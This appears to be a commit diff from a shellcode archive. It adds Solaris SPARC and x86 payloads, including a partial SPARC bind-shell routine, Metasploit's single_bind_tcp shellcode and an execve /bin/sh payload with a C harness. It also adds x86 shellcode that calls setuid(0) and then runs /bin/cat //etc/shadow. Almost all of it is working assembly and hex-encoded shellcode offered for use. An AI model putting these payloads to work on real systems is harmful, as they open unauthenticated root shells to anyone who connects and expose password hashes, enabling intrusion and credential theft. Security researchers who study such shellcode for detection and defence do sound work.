add %l7, (232 - 16), %g1
ta 8 ! bind(s, &sa, sa_len);
xor %o3, %l2, %o0
sub %l7, (16 - 5), %o1
add %l7, (233 - 16), %g1
ta 8 ! listen(s, SOMAXCONN);
xor %o3, %l2, %o0
xor %o3, %l0, %o1
sub %sp, 20, %o2
add %l7, (234 - 16), %g1
ta 8
xor %o3, %o0, %l3 ! c = accept(s, &sa, &sa_len);
xor %o3, %l3, %o0
sub %l7, (16 - 9), %o1
xor %sp, %sp, %o2
add %l7, (62 - 16), %g1
ta 8 ! ioctl(c, I_DUP2FD, 0);
xor %o3, %l3, %o0
sub %l7, (16 - 9), %o1
add %o3, 1, %o2
add %l7, (62 - 16), %g1
ta 8 ! ioctl(c, I_DUP2FD, 1);
xor %o3, %l3, %o0
sub %l7, (16 - 9), %o1
add %o3, 2, %o2
add %l7, (62 - 16), %g1
ta 8 ! ioctl(c, I_DUP2FD, 2);
xor %sp, %sp, %o0 ! %o0 = 0;
add %o3, 23, %g1
ta 8 ! setuid(0);
set 0x2f62696e, %l0 ! (void*)sh = '/bin';
set 0x2f736800, %l1 ! (void*)sh + 4 = '/sh0';
sub %sp, 16, %o0 ! %o0 = '/bin/sh';
sub %sp, 8, %o1 ! %o1 = {'/bin/sh', NULL};
xor %sp, %sp, %o2 ! %o2 = NULL;
std %l0, [%sp - 16]
st %o0, [%sp - 8] ! argv[0] = sh;
st %g0, [%sp - 4] ! argv[1] = NULL;
add %o3, 59, %g1
ta 8 ! execve(sh, argv, NULL);
xor %sp, %sp, %o0 ! %o0 = 0;
add %o3, 160, %g1 ! %g1 = 160;
ta 8 ! lwp_exit(0)

78
shellcodes/solaris_sparc/43623.asm Normal file
View file

@ -0,0 +1,78 @@
##
#
# Name: single_bind_tcp
# Platforms: Solaris
# Authors: vlad902 <vlad902 [at] gmail.com>
# Version: $Revision: 1.2 $
# License:
#
# This file is part of the Metasploit Exploit Framework
# and is subject to the same licenses and copyrights as
# the rest of this package.
#
# Description:
#
# Single bind TCP shell.
#
##
.globl main
main:
andn %sp, 7, %sp
mov 1, %o4
xor %o3, %o3, %o3
xor %o3, %o3, %o2
mov 0x02, %o1
mov 0x02, %o0
mov 0xe6, %g1
ta 0x08
st %o0, [ %sp - 0x08 ]
#ifndef NO_NULLS
set 0x00027a68, %l0
#else
set 0x27a68fff, %l0
srl %l0, 12, %l0
#endif
st %l0, [ %sp - 0x10 ]
st %g0, [ %sp - 0x0c ]
sub %sp, 16, %o1
mov 0x10, %o2
mov 0xe8, %g1
ta 0x08
ld [ %sp - 0x08 ], %o0
mov 0x01, %o1
mov 0xe9, %g1
ta 0x08
ld [ %sp - 0x08 ], %o0
xor %o1, %o1, %o1
or %o1, %o1, %o2
mov 0xea, %g1
ta 0x08
st %o0, [ %sp - 0x08 ]
mov 3, %o2
fcntl_loop:
mov 9, %o1
subcc %o2, 1, %o2
mov 0x3e, %g1
ta 0x08
bnz fcntl_loop
ld [ %sp - 0x08 ], %o0
xor %o3, %o3, %o2
set 0x2f62696e, %l0
set 0x2f736800, %l1
sub %sp, 0x10, %o0
sub %sp, 0x08, %o1
std %l0, [ %sp - 0x10 ]
st %o0, [ %sp - 0x08 ]
st %g0, [ %sp - 0x04 ]
mov 0x3b, %g1
ta 0x08

50
shellcodes/solaris_x86/43624.asm Normal file
View file

@ -0,0 +1,50 @@
Name = John Babio
Twitter = 3vi1john
SunOS opensolaris 10 5.11 i86pc i386 i86pc
setuid(0) /bin/cat //etc/shadow
char code[]=
"\x33\xc0\x50\x50\xb0\x17\xcd\x91\x33\xd2\x52\x68\x61\x64\x6f"
"\x77\x68\x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\x8b\xcc\x52\x68"
"\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8b\xdc\x52\x51\x53\x8b"
"\xcc\x52\x51\x53\xb0\x3b\x52\xcd\x91\x33\xc0\x50\xb0\x01\xcd\x91";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
8050410 <_start>:
8050410: 33 c0 xor %eax,%eax
8050412: 50 push %eax
8050413: 50 push %eax
8050414: b0 17 mov $0x17,%al
8050416: cd 91 int $0x91
8050418: 33 d2 xor %edx,%edx
805041a: 52 push %edx
805041b: 68 61 64 6f 77 push $0x776f6461
8050420: 68 63 2f 73 68 push $0x68732f63
8050425: 68 2f 2f 65 74 push $0x74652f2f
805042a: 8b cc mov %esp,%ecx
805042c: 52 push %edx
805042d: 68 2f 63 61 74 push $0x7461632f
8050432: 68 2f 62 69 6e push $0x6e69622f
8050437: 8b dc mov %esp,%ebx
8050439: 52 push %edx
805043a: 51 push %ecx
805043b: 53 push %ebx
805043c: 8b cc mov %esp,%ecx
805043e: 52 push %edx
805043f: 51 push %ecx
8050440: 53 push %ebx
8050441: b0 3b mov $0x3b,%al
8050443: 52 push %edx
8050444: cd 91 int $0x91
8050446: 33 c0 xor %eax,%eax
8050448: 50 push %eax
8050449: b0 01 mov $0x1,%al
805044b: cd 91 int $0x91

42
shellcodes/solaris_x86/43625.c Normal file
View file

@ -0,0 +1,42 @@
/*
* Solaris shellcode - execve /bin/sh
*/
#include
// http://www.shellcode.com.ar
//
// execve(//bin/sh)
char shellcode[]=
"\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh
"\xf7\xd0" // not eax
"\x50" // push eax
"\x31\xc0" // xor eax, eax
"\xb0\x9a" // mov al, 09ah
"\x50" // push eax
"\x89\xe5" // mov ebp, esp
"\x31\xc0" // xor eax, eax
"\x50" // push eax
"\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
"\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
"\x89\xe3" // mov ebx, esp
"\x50" // push eax
"\x53" // push ebx
"\x89\xe2" // mov edx, esp
"\x50" // push eax
"\x52" // push edx
"\x53" // push ebx
"\xb0\x3b" // mov al, 59
"\xff\xd5"; // call ebp
//
int
main(void)
{
void (*code)() = (void *)shellcode;
printf("Shellcode length: %d\n", strlen(shellcode));
code();
return(1);
}